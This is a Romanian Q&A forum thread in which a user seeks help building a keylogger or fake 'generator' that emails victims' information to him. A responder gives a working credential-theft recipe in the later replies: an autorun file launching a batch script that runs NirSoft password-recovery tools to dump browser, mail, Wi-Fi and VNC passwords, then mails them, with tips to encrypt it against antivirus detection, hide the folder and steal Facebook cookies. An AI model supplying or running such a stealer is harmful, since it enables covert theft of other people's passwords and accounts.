| anonim_4396 a întrebat:

Salut TPU,
Am nevoie de ajutor la o chestie, in special de la programatori dar nu este neaparat.
Vreau sa fac un fel de keylogger care sa imi trimita informatiile pe email.
Lasati-ma sa va explic mai bine:
stiti programul Microsoft visual basic 2010 sau 2008?
vreau sa fac un format cu textbox si cu button, si daca apas pe buton informatie se trimite la emailul meu big grin
poate prin team viewer sa-mi faca cineva las skypeul si facebookul pentru contact.
skype: tusrus31
facebook:Cristy JumpStreet
ps: nu e neaparat sa fie cu Microsoft visual basic dar vreau ca sa arate ca un generator fake.
dau funda multumesc anticipat happy

Răspuns Câştigător
| ChristianS a răspuns:

Pai da dar el/ea o sa vada pe ecran treaba asta cam o secunda ca se trimite un mail

22 răspunsuri:
| Jipa95 a răspuns:

Stiai ca asta este ilegal? Stai potolit daca nu vrei sa vina jandarmii cu colindu' la tine.

| ChristianS a răspuns (pentru Jipa95):

Ce ilegal visezi laughing toata lumea baga keyloggere ca nici macar nu prea se mai ocupa astia da asta
lasa jandarmii sa vina dracu
stii sau nu?

| AdrenalinTm a răspuns:

laughingsi daca ar fi sa-l faci un program gen ala cu cunostinte minime ai sa te loveasca pana si cel mai banal antivirus cel din windows daca iti doresti doar aaja pentru amuzamentul tau sunt kilogere de cumparat sau deja cumparate si puse pe net cu un videotutorial te descurci dar daca are un antivirus mai bunicel free updatat te opreste si asta

| ChristianS a răspuns (pentru AdrenalinTm):

Eu stiu foarte bine ma, m-am uitat la tutoriale numai ca ceva imi merge gresit si n-am avut nevoie de explicatii -_-
stii cum sa faci sau nu?

| AdrenalinTm a răspuns (pentru ChristianS):

Nu te-ai uitat la tutorialele potrivite crede-ma keyloggere in ziua de azi is la un nivel de n-ai cum sa ascunzi nimic de pe un dispozitiv
da spune unde te incurci

| ChristianS a răspuns (pentru AdrenalinTm):

Cred ca m-am uitat la toate de pe net laughing
da-mi add pe skype sau pe facebook te rog

| AdrenalinTm a răspuns (pentru ChristianS):

N-am nici skype nici facebook *(nu vreau sa ma spioneze statul)

| AdrenalinTm a răspuns (pentru AdrenalinTm):

Zi-mi exact ce ai nevoi

| ChristianS a răspuns (pentru AdrenalinTm):

Atunci da-mi macar tutorialul corect laughing
poate ma ajuti cu cv ca oricum trebuie sa dau funda

| ChristianS a răspuns (pentru AdrenalinTm):

Dar vreau sa fie cu textbox si button daca se poate!
multumesc

| AdrenalinTm a răspuns (pentru AdrenalinTm):

Dacxa vrei sati usurezi munca invata linux(kalilinux) cauta despre asta tutoriale daca vrei ceva avansat si sa lucreze pe mai multe planuri
ce vrei u cu butoane nu prea este, este doar o varianta simpla care nu o faci din visual
se face simplu ia parolele din browsere si le salveaza intr-un document text
de aici alegi ce ai nevoie http://www.nirsoft.net/password_recovery_tools.html
poti alege si mai multe stai sati caut un tutorial cam cum se procedeaza

| ChristianS a răspuns (pentru AdrenalinTm):

Inca o chestie e obligatoriu sa imi trimita in email nu e neaparat sa fie cu buton, dar trebuie sa imi trimita in emailul meu! si ca sa intelegi mai bine ca sa fiu sigur ca ai inteles, eu vreau ca doar informatia pe care am scris-o in textbox sa fie trimisa in email nu altceva
asta doar ca sa stii
multumesc
si tot vreau tutorialul big grin

| ChristianS a răspuns (pentru AdrenalinTm):

Si linux am sa invat stai linistit dar inca nu sunt chiar la faza asta. sigur ca voi vrea sa invat big grin

| ChristianS a răspuns (pentru ChristianS):

Nu conteaza. doar asta vreau sa stiu pentru ca eu voi folosi team viewer si in momentul acela cand apas pe buton dau la dekstop, asta nu e treaba ta ma descurc intr-un fel
multumesc

| ChristianS a răspuns (pentru ChristianS):

Tutorialul? asta e cheia pentru ce vreau eu
dar te rog asigurate ca merge multumesc
poate chiar tu il testezi dar nu trebuie neaparat

| AdrenalinTm a răspuns (pentru ChristianS):

laughingstiu ca te descurci doar o sa iti arat cum nu?laughingsi ce vrei u nu e keylogger

| AdrenalinTm a răspuns (pentru ChristianS):

De mers mergelaughingma asta nu inseamna ca am sa-ti dau mor in gura

| ChristianS a răspuns (pentru AdrenalinTm):

Pai drqqqq de ce te-ai mai obosit sa imi scrii laughing crezi ca primesti funda pentru un rahat de ajutor! du-te de aici ma laughing
treaba ta, se numeste keymailer nu? oricum nu prea conteaza

| ChristianS a răspuns (pentru AdrenalinTm):

Crezi ca e asa greu sa dau unui programator cunoscut 5 euro si sa imi explice laughing nu mai ca mie mila de aia 5 euro laughing ma fwt in gura de ajutoru tau!
chiar maine ma duc sa il intreb

| ChristianS a răspuns (pentru AdrenalinTm):

Deja m-a ajutat unu si nu i-am dat 5 euro mersi oricum hai cati dau funda

| AdrenalinTm a răspuns (pentru ChristianS):

Ba eu nu vreau funda:))
si nici nu vreau bani:))
:)))))))))))))))))))esti prea nervos tinere:))
daca mam chinui sa-ti fac o mica schema acuma tio trimit doar n-am facut-o dejeaba si sa stii ca m-am chinuit sa-ti explic pasi:))cu toate ca nu sunt bun la asta
Deci intri pe siteul ala http://www.nirsoft.net/password_recovery_tools.html
dawlodezi ce ai nevoie(de ce parole ai u nevoie de la ce serviciu vrei u)
dupa le dezarhivezi le pui toate intr-un folder (dezarhivate)dupa deschizi un document text in acelasi folder si scrii asa
[autorun]
open=launch.bat
ACTION= Aici scrii ce vrei u
@ECHO OFF

dupa il salvezi asa AUTORUN.inf
dupa aia mai deschizi un text document si scrii asa
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt

start USBDeview.exe /stext USBDeview.txt
@ECHO OFF
START mailto:mailul tau?
subject=Errorˆ&body=Returncode%%20%errorlevel%%%20was%%20returned%%
20by%%20the%%20backup%%20program.
eu ti le-am scris pe toate u iti alegi doar ce vrei u si ce ai nevoie
asta il salvezi asa LAUNCH.bat
dupa poti cripta treaba asta sa nu fie detectabila de antivirus asta e si mai mult de explicat deci te las sa cauti pe net, mai poti adauga mici trucuri hide folder si ce mai sty u

| ChristianS a răspuns (pentru ChristianS):

Pai da dar el/ea o sa vada pe ecran treaba asta cam o secunda ca se trimite un mail

| AdrenalinTm a răspuns:

In schimb ai putea sa faci cumva sa furi cokiul de la facebook din pc lui care contine absolut tot ce are un pc l-ai putea explouata dar intai ai nevoie de un program de decriptare